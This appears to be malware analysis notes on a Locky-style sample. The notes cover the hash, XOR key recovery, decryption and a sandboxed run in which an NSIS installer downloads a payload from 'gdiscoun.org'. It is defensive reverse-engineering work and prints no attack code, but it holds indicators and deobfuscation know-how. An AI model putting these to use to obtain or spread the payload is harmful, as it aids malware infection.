| SHA256 | ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537 |
| SSDEEP | 768:YjfIXLfyiPbAIChFgcD8vEkICdc4yVi0IRvlua4JewL5aM:Y8LfyisIChFgXpzyVrwOYc5d,"436625438" |
| File Name | 436625438 |
| File Size | 27 kB |
| File Modification Date/Time | 2017-10-19 09:17:14 |

- Using DIE (Detect It Easy) and binwalk tools to check the level of entropy on the file:

  ![](./files/ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537/screenshots/die_binwalk.png)

- With the use of a hex viewer, of interest is offset 00005a10 to 00005b70 as there is data repetition:
 
  ![](./files/ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537/screenshots/hexyl.png)

- xortool with -c 00 (binary) 
 
  ![](./files/ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537/screenshots/xortool.png)

- On the Windows analysis machine, HxD reports CFh as the highest number of occurrences in the code:

  ![](./files/ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537/screenshots/xor_analysis.png)

- Using Xor tool `xor.exe 436625438 436625438_my_test âFï"`:

  ![](./files/ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537/screenshots/xor_decrypt_win.png)

  ![](./files/ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537/screenshots/xord.png)

- A custom XOR python decrypter was written to decrypt the file [unxor.py](https://gitlab.com/antonio.godinho/ma-locky-simple/-/blob/master/files/ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537/notes/unxor.py):
  
  ![](./files/ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537/screenshots/python_xor.png)

- Once imported into Cutter, this tool is now able to analyse the file and identify various functions, where before decryption it would fail to do so:
 
  ![](./files/ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537/screenshots/cutter_shows_functions.png)

- While running the malware in the Analysis machine, the file 436625438 is extracted to the AppData\Local\Temp directory:

  ![](./files/ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537/screenshots/malware_execution.png)

- When the NSIS installer (ekakva32.exe file) is run it reaches out to contact `ds.download.windowsupdate.com` and downloads the payload from `gdiscoun.org` (using InetSim to simulate the services):

  ![](./files/d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4/screenshots/wireshark_traffic.png)